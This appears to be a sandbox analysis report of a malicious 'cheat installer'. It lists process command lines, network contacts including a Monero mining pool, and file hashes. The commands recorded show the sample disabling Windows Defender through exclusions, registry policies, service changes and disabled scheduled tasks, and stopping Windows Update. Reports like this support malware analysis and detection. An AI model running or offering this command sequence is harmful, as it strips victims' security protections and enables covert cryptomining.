"C:\Windows\Installer\MSIAF1C.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssAF1F.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiAF1C.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrAF1D.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrAF1E.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B021.tmp\B022.tmp\B023.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10 /nobreak

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\Installer\MSIE2C0.tmp

"C:\Windows\Installer\MSIE2C0.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Windows\Installer\MSIE2C1.tmp

"C:\Windows\Installer\MSIE2C1.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\Installer\MSIE2C2.tmp

"C:\Windows\Installer\MSIE2C2.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 162.19.139.184:12222 xmr.2miners.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe

MD5 ad76b1a5d038cf31e2ec015b76cd3216
SHA1 c016f7f9bdbb10e7b29414fce08b5a6840be342f
SHA256 f3bcbc5f620b9f271daa26ad0a01f55c4aeaf558b11a7b939f6f27c39bc17ffa
SHA512 2ebfdf579d61dfd796e3150d3ea07fa6723369aec42fb760e725b4715d45d1d38a2f9ace0f64b435c85aafeaf3c91b998432adee3135b79e06e4faa292259f9f

C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe

MD5 70c2c0bdd31ab9c6dfb9739b81e67306
SHA1 1d34a6bc3b093444dd8454f09cbf44ed853f6469
SHA256 db9cd3e731b7e994e9a00ec01856bea9cfd8c1378979946ae831e18285bdfb2f
SHA512 37ad7efc68b7ccdfba215dda3ee451ae978827dd5f808f129ffc27fe0d78c1aebe37a5eb42d79807d39501f1ffa9aa3ec4b2193a02821eae70c21d1a8a1cea00

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 88d6ef66043282511d78477c3457cd05
SHA1 dedf2529b0f78f9d7dfe5519d080fe1d11fb0344
SHA256 82efcbda4a568f2e898f2c97d3876af8c4c42f2638a339b937b01202bb83fb4a
SHA512 506e03b18e11c6133eb4b997bfd017ab5e5ed7a253e0470ee391d8bf5f86196742b57ec03316f1d5699f7a2f556df38468c539a6ff70c52e092bf0c1de61fa2b

C:\Users\Admin\AppData\Local\Temp\MSI8DF9.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Local\Temp\MSI8E49.tmp

MD5 6bb65410717bb2c62ed92cdbc9c41652
SHA1 1f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA256 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA512 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38

C:\Windows\Installer\MSI9119.tmp

MD5 a8338e7b3ce49ab7e793952765ac998f
SHA1 29a2dd67eba553530f84f9e02266474ea678abdd
SHA256 6fa584e22fc546b95fa757279ce5569e5540bf2ac28b138adba41877fe0c645d
SHA512 85c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5xxl02n.kuw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3968-3591-0x00000265ED230000-0x00000265ED252000-memory.dmp

memory/3968-3592-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

memory/3968-3594-0x00000265ED260000-0x00000265ED270000-memory.dmp

memory/3968-3593-0x00000265ED260000-0x00000265ED270000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss9156.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

C:\Users\Admin\AppData\Local\Temp\scr9145.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\scr9144.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 063bc591b74125e942f22e2a08afc6fb
SHA1 562e593efbaf17442708a3d5f3d645e0b6a5b6a1
SHA256 b06ed51bdde83ce66d7949f271dabfc79900634ff2bfea86c044718ecab03558
SHA512 dbc865a9b53693ca9f701506df5ee0b0a97c119363a4e38478a7909fec9c7ad2cff33b7abcad6acd68cb0c289fb3d0f310d99a55c615d1faff23365695e0eccf

C:\Users\Admin\AppData\Local\Temp\progressgood.bat

MD5 845cf6630a4a8d184f93d0f732feb846
SHA1 1d9219177aaf25e5a95bdc72ec8cd6fd42e6cace
SHA256 19f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153
SHA512 bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e

memory/3968-3666-0x00007FFB20F60000-0x00007FFB21A22000-memory.dmp

C:\Windows\Installer\MSI9439.tmp

MD5 2557173f4299722afce46cc3c0616406
SHA1 b0343c9a9552be977834e415783b486c4714fe97
SHA256 e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591
SHA512 24a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_sc09.wav

MD5 1adb62c4d995588938597846d7133d73
SHA1 dc05a280ad0dbbcfb27a974b1cdb51f1e0d23c3e
SHA256 e8074c1caffab6b5af3c668c6284c9f3a025ab388fb4f439f0e6becd286ebfe9
